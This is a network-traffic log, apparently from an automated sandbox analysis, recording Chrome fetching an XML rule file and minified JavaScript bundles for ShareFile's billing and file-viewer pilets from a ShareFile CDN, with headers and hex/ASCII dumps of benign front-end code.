                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:18 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 404
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                                                                x-ms-request-id: dac0d9b0-601e-0097-08fb-19f33a000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180518Z-185b7d577bd6kqv2c47qpxmgb000000001bg000000016782
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                96192.168.2.64982113.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC598OUTGET /sharefile-web/sharefiledev-billing-pilet/0.1.121/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC610INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 98732
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 25 Sep 2024 15:09:00 GMT
                                                                                                                                                                                                                                                                                ETag: "cdca5117242386d7cabb8c5cdee3f9a1"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 3aed5a4f89d72775aaf2cc5a5f642386.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: gqvlfAHfAhxd5nyGHTBUZqDHod9mmd1yGCDcpPvymQFMf2-HhwBKXQ==
                                                                                                                                                                                                                                                                                Age: 45977
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC15774INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 62 69 6c 6c 69 6e 67 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 75 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevbillingpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},a={},s={},u={},c={};return
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 6f 52 65 73 6f 6c 76 65 48 69 65 72 61 72 63 68 79 28 74 2e 6c 6e 67 7c 7c 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 29 3a 44 2e 70 75 73 68 28 74 2e 6c 6e 67 7c 7c 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 29 3b 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 76 61 72 20 6f 3d 4c 26 26 72 21 3d 3d 76 3f 72 3a 5f 3b 69 2e 6f 70 74 69 6f 6e 73 2e 6d 69 73 73 69 6e 67 4b 65 79 48 61 6e 64 6c 65 72 3f 69 2e 6f 70 74 69 6f 6e 73 2e 6d 69 73 73 69 6e 67 4b 65 79 48 61 6e 64 6c 65 72 28 65 2c 66 2c 6e 2c 6f 2c 49 2c 74 29 3a 69 2e 62 61 63 6b 65 6e 64 43 6f 6e 6e 65 63 74 6f 72 26 26 69 2e 62 61 63 6b 65 6e 64 43 6f 6e 6e 65 63 74 6f 72 2e 73 61 76 65 4d 69 73 73 69 6e 67 26 26 69 2e 62 61 63 6b 65 6e 64 43 6f 6e 6e 65 63 74 6f 72 2e 73 61 76 65 4d
                                                                                                                                                                                                                                                                                Data Ascii: oResolveHierarchy(t.lng||this.language):D.push(t.lng||this.language);var V=function(e,n,r){var o=L&&r!==v?r:_;i.options.missingKeyHandler?i.options.missingKeyHandler(e,f,n,o,I,t):i.backendConnector&&i.backendConnector.saveMissing&&i.backendConnector.saveM
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 63 28 65 29 7d 7d 2c 7b 72 65 67 65 78 3a 74 68 69 73 2e 72 65 67 65 78 70 2c 73 61 66 65 56 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 2e 65 73 63 61 70 65 56 61 6c 75 65 3f 63 28 73 2e 65 73 63 61 70 65 28 65 29 29 3a 63 28 65 29 7d 7d 5d 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 61 3d 30 3b 69 3d 74 2e 72 65 67 65 78 2e 65 78 65 63 28 65 29 3b 29 7b 76 61 72 20 6e 3d 69 5b 31 5d 2e 74 72 69 6d 28 29 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 28 6f 3d 6c 28 6e 29 29 29 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 66 29 7b 76 61 72 20 75 3d 66 28 65 2c 69 2c 72 29 3b 6f 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65
                                                                                                                                                                                                                                                                                Data Ascii: function(e){return c(e)}},{regex:this.regexp,safeValue:function(e){return s.escapeValue?c(s.escape(e)):c(e)}}].forEach((function(t){for(a=0;i=t.regex.exec(e);){var n=i[1].trim();if(void 0===(o=l(n)))if("function"==typeof f){var u=f(e,i,r);o="string"==type
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 64 20 63 61 6c 6c 20 69 6e 69 74 20 6a 75 73 74 20 6f 6e 63 65 21 22 29 2c 65 2e 69 73 49 6e 69 74 69 61 6c 69 7a 65 64 3d 21 30 2c 65 2e 6f 70 74 69 6f 6e 73 2e 69 73 43 6c 6f 6e 65 7c 7c 65 2e 6c 6f 67 67 65 72 2e 6c 6f 67 28 22 69 6e 69 74 69 61 6c 69 7a 65 64 22 2c 65 2e 6f 70 74 69 6f 6e 73 29 2c 65 2e 65 6d 69 74 28 22 69 6e 69 74 69 61 6c 69 7a 65 64 22 2c 65 2e 6f 70 74 69 6f 6e 73 29 2c 6c 2e 72 65 73 6f 6c 76 65 28 72 29 2c 6e 28 74 2c 72 29 7d 3b 69 66 28 65 2e 6c 61 6e 67 75 61 67 65 73 26 26 22 76 31 22 21 3d 3d 65 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 61 74 69 62 69 6c 69 74 79 41 50 49 26 26 21 65 2e 69 73 49 6e 69 74 69 61 6c 69 7a 65 64 29 72 65 74 75 72 6e 20 74 28 6e 75 6c 6c 2c 65 2e 74 2e 62 69 6e 64 28 65 29 29 3b 65 2e 63 68 61 6e
                                                                                                                                                                                                                                                                                Data Ascii: d call init just once!"),e.isInitialized=!0,e.options.isClone||e.logger.log("initialized",e.options),e.emit("initialized",e.options),l.resolve(r),n(t,r)};if(e.languages&&"v1"!==e.options.compatibilityAPI&&!e.isInitialized)return t(null,e.t.bind(e));e.chan
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 65 77 20 53 65 74 28 4f 62 6a 65 63 74 2e 76 61 6c 75 65 73 28 4e 65 29 29 29 2c 66 61 6c 6c 62 61 63 6b 4c 6e 67 3a 22 65 6e 22 2c 70 6f 73 74 50 72 6f 63 65 73 73 3a 5b 22 72 65 61 63 74 50 6f 73 74 70 72 6f 63 65 73 73 6f 72 22 5d 2c 69 6e 69 74 49 6d 6d 65 64 69 61 74 65 3a 21 31 2c 63 6f 6d 70 61 74 69 62 69 6c 69 74 79 4a 53 4f 4e 3a 22 76 33 22 2c 6d 69 73 73 69 6e 67 49 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 48 61 6e 64 6c 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 3f 74 2e 70 6f 70 28 29 3a 22 22 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 5f 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 75 73 65 28 6e 65 77 20 43 65 28 7b 70 72 65 66 69 78 3a 22 7b 3c 22 2c 73 75 66 66 69 78 3a
                                                                                                                                                                                                                                                                                Data Ascii: ew Set(Object.values(Ne))),fallbackLng:"en",postProcess:["reactPostprocessor"],initImmediate:!1,compatibilityJSON:"v3",missingInterpolationHandler:function(e,t){return Array.isArray(t)?t.pop():""}};function _e(e,t){return e.use(new Ce({prefix:"{<",suffix:
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 65 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 65 7d 6e 2e 64 28 74 2c 7b 41 3a 28 29 3d 3e 72 7d 29 7d 2c 34 36 37 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 29 7b 74 72 79 7b 76 61 72 20 73 3d 65 5b 6f 5d 28 61 29 2c 75 3d 73 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 6e
                                                                                                                                                                                                                                                                                Data Ascii: se strict";function r(e){if(void 0===e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}n.d(t,{A:()=>r})},467:(e,t,n)=>{"use strict";function r(e,t,n,r,i,o,a){try{var s=e[o](a),u=s.value}catch(e){return void n
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC1038INData Raw: 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 28 29 26 26 28 6e 2e 73 66 2e 72 65 67 69 73 74 65 72 4c 65 66 74 53 65 63 6f 6e 64 61 72 79 4e 61 76 43 68 69 6c 64 43 6f 6d 70 6f 6e 65 6e 74 28 7b 68 72 65 66 3a 4e 2e 42 36 2c 74 69 74 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 28 4f 2e 52 65 63 65 69 70 74 73 29 7d 2c 77 65 69 67 68 74 3a 32 30 30 2c 70 61 72 65 6e 74 3a 4e 2e 43 69 7d 29 2c 6e 2e 72 65 67 69 73 74 65 72 50 61 67 65 28 22 22 2e 63 6f 6e 63 61 74 28 4e 2e 42 36 2c 22 2f 3a 6f 72 64 65 72 49 64 3f 2f 3a 73 75 63 63 65 73 73 46 6c 61 67 3f 22 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 61 2e 50 2c 7b 70 69 6c 65 74 41 70 69 3a 6e 7d 2c 65 2e
                                                                                                                                                                                                                                                                                Data Ascii: )return!1;return!0}()&&(n.sf.registerLeftSecondaryNavChildComponent({href:N.B6,title:function(){return A(O.Receipts)},weight:200,parent:N.Ci}),n.registerPage("".concat(N.B6,"/:orderId?/:successFlag?"),(function(){return e.createElement(a.P,{piletApi:n},e.


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                97192.168.2.64982213.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC600OUTGET /sharefile-web/sharefiledev-fileviewer-pilet/1.29.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC612INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 1165518
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 30 Sep 2024 07:00:08 GMT
                                                                                                                                                                                                                                                                                ETag: "b1017618baa776fde10e1abb9b5576d1"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 3aed5a4f89d72775aaf2cc5a5f642386.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: tIh4CRF9F4VRsEmbd_1uZHze-_YQIp0iYebImEu_L5qN7bmwA2A8Gw==
                                                                                                                                                                                                                                                                                Age: 45977
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 66 69 6c 65 76 69 65 77 65 72 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 73 3d 7b 7d 3b 72 65 74 75 72 6e 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 63 6f 6c 6f 72 50 61 6c 65 74 74 65 3d 65 2e 63 6f 6c 6f 72 50 61 6c 65 74 74 65 2c 6e 2e 64 65 66 61 75 6c 74 41 6e 74 44 43 6f 6e 66 69 67 3d 65 2e 64 65 66 61 75 6c 74
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevfileviewerpilet,{})System.register(["@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var n={},r={},i={},s={};return{setters:[function(e){n.colorPalette=e.colorPalette,n.defaultAntDConfig=e.default
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 74 41 74 74 72 69 62 75 74 65 28 76 65 29 29 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 74 3d 4e 75 6d 62 65 72 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 65 29 7c 7c 30 29 3b 72 65 74 75 72 6e 20 73 3e 3d 74 7d 29 29 3b 69 66 28 75 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 64 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6c 2c 75 5b 75 2e 6c 65 6e 67 74 68 2d 31 5d 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 2c 6c 7d 64 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6c 2c 63 29 7d 65 6c 73 65 20 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6c 29 3b 72 65 74 75 72 6e 20 6c 7d 66 75 6e 63 74 69 6f 6e 20 54 65 28 65 29 7b 76 61 72 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f
                                                                                                                                                                                                                                                                                Data Ascii: tAttribute(ve)))return!1;var t=Number(e.getAttribute(be)||0);return s>=t}));if(u.length)return d.insertBefore(l,u[u.length-1].nextSibling),l}d.insertBefore(l,c)}else d.appendChild(l);return l}function Te(e){var t=arguments.length>1&&void 0!==arguments[1]?
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 48 33 2e 36 36 37 43 32 2e 37 34 37 20 32 20 32 20 32 2e 37 34 36 20 32 20 33 2e 36 36 37 76 31 36 2e 36 36 36 43 32 20 32 31 2e 32 35 33 20 32 2e 37 34 36 20 32 32 20 33 2e 36 36 37 20 32 32 68 31 36 2e 36 36 36 63 2e 39 32 20 30 20 31 2e 36 36 37 2d 2e 37 34 36 20 31 2e 36 36 37 2d 31 2e 36 36 37 56 33 2e 36 36 37 43 32 32 20 32 2e 37 34 37 20 32 31 2e 32 35 34 20 32 20 32 30 2e 33 33 33 20 32 22 7d 29 2c 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 23 66 66 66 22 2c 64 3a 22 4d 31 37 2e 38 33 34 20 37 48 36 2e 31 36 37 61 2e 38 33 33 2e 38 33 33 20 30 20 30 20 30 2d 2e 38 33 33 2e 38 33 33 76 38 2e 33 33 34 63 30 20 2e 34 36 2e 33 37 33 2e 38 33 33 2e 38 33 33 2e 38 33 33 68 31 31 2e 36 36 37 63 2e 34 36 20
                                                                                                                                                                                                                                                                                Data Ascii: H3.667C2.747 2 2 2.746 2 3.667v16.666C2 21.253 2.746 22 3.667 22h16.666c.92 0 1.667-.746 1.667-1.667V3.667C22 2.747 21.254 2 20.333 2"}),i.createElement("path",{fill:"#fff",d:"M17.834 7H6.167a.833.833 0 0 0-.833.833v8.334c0 .46.373.833.833.833h11.667c.46
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC15231INData Raw: 20 31 34 2e 35 76 2d 31 2e 39 36 35 48 37 2e 35 39 63 31 2e 31 35 35 20 30 20 31 2e 39 32 34 2d 2e 36 33 20 31 2e 39 32 34 2d 31 2e 37 30 36 20 30 2d 31 2e 31 33 36 2d 2e 38 37 34 2d 31 2e 37 35 31 2d 32 2e 30 34 34 2d 31 2e 37 35 31 48 35 2e 35 34 36 56 31 34 2e 35 7a 6d 31 2e 30 39 35 2d 32 2e 36 39 36 48 36 2e 34 36 35 56 39 2e 37 39 38 68 31 2e 30 37 36 63 2e 36 33 34 20 30 20 31 2e 31 30 37 2e 33 35 36 20 31 2e 31 30 37 2e 39 37 38 20 30 20 2e 36 31 32 2d 2e 34 34 37 20 31 2e 30 32 38 2d 31 2e 30 38 20 31 2e 30 32 38 4d 31 31 2e 33 31 20 31 34 2e 35 76 2d 31 2e 39 36 35 68 31 2e 31 31 38 63 31 2e 31 35 35 20 30 20 31 2e 39 32 33 2d 2e 36 33 20 31 2e 39 32 33 2d 31 2e 37 30 36 20 30 2d 31 2e 31 33 36 2d 2e 38 37 33 2d 31 2e 37 35 31 2d 32 2e 30 34 33
                                                                                                                                                                                                                                                                                Data Ascii: 14.5v-1.965H7.59c1.155 0 1.924-.63 1.924-1.706 0-1.136-.874-1.751-2.044-1.751H5.546V14.5zm1.095-2.696H6.465V9.798h1.076c.634 0 1.107.356 1.107.978 0 .612-.447 1.028-1.08 1.028M11.31 14.5v-1.965h1.118c1.155 0 1.923-.63 1.923-1.706 0-1.136-.873-1.751-2.043
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 69 6e 64 74 22 2c 22 69 6e 78 22 5d 2c 6b 65 79 6e 6f 74 65 3a 5b 22 6b 65 79 22 5d 2c 72 69 76 65 74 3a 5b 22 72 76 74 22 5d 2c 6e 61 76 69 73 77 6f 72 6b 73 3a 5b 22 6e 77 64 22 2c 22 6e 77 66 22 5d 2c 6e 6f 74 65 77 6f 72 74 68 79 43 6f 6d 70 6f 73 65 72 3a 5b 22 6e 77 63 22 2c 22 6e 77 63 74 78 74 22 5d 2c 6e 75 6d 62 65 72 73 3a 5b 22 6e 75 6d 62 65 72 73 22 5d 2c 6f 6e 65 6e 6f 74 65 3a 5b 22 6f 6e 65 22 2c 22 6f 6e 65 61 22 2c 22 6f 6e 65 74 6f 63 22 2c 22 6f 6e 65 74 6f 63 32 22 2c 22 6f 6e 65 74 6d 70 22 2c 22 6f 6e 65 70 6b 67 22 5d 2c 70 61 67 65 73 3a 5b 22 70 61 67 65 73 22 5d 2c 70 64 66 3a 5b 22 70 64 66 22 5d 2c 70 68 6f 74 6f 73 68 6f 70 3a 5b 22 70 73 64 22 2c 22 70 73 22 5d 2c 70 6f 77 65 72 70 6f 69 6e 74 3a 5b 22 70 6f 74 22 2c 22 70
                                                                                                                                                                                                                                                                                Data Ascii: indt","inx"],keynote:["key"],rivet:["rvt"],navisworks:["nwd","nwf"],noteworthyComposer:["nwc","nwctxt"],numbers:["numbers"],onenote:["one","onea","onetoc","onetoc2","onetmp","onepkg"],pages:["pages"],pdf:["pdf"],photoshop:["psd","ps"],powerpoint:["pot","p
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 2c 70 6f 73 69 74 69 6f 6e 3a 22 66 69 78 65 64 22 2c 62 6f 74 74 6f 6d 3a 30 2c 77 69 64 74 68 3a 22 31 30 30 25 22 2c 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 75 6c 6c 3d 3d 3d 28 69 72 3d 73 74 2e 64 65 66 61 75 6c 74 41 6e 74 44 43 6f 6e 66 69 67 2e 74 6f 6b 65 6e 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 72 3f 76 6f 69 64 20 30 3a 69 72 2e 63 6f 6c 6f 72 42 67 4c 61 79 6f 75 74 2c 70 61 64 64 69 6e 67 3a 22 31 30 70 78 22 2c 62 6f 72 64 65 72 54 6f 70 3a 22 31 70 78 20 73 6f 6c 69 64 20 22 2e 63 6f 6e 63 61 74 28 6e 75 6c 6c 3d 3d 3d 28 73 72 3d 73 74 2e 64 65 66 61 75 6c 74 41 6e 74 44 43 6f 6e 66 69 67 2e 74 6f 6b 65 6e 29 7c 7c 76 6f 69 64 20 30 3d
                                                                                                                                                                                                                                                                                Data Ascii: splay:"flex",justifyContent:"center",position:"fixed",bottom:0,width:"100%",background:null===(ir=st.defaultAntDConfig.token)||void 0===ir?void 0:ir.colorBgLayout,padding:"10px",borderTop:"1px solid ".concat(null===(sr=st.defaultAntDConfig.token)||void 0=
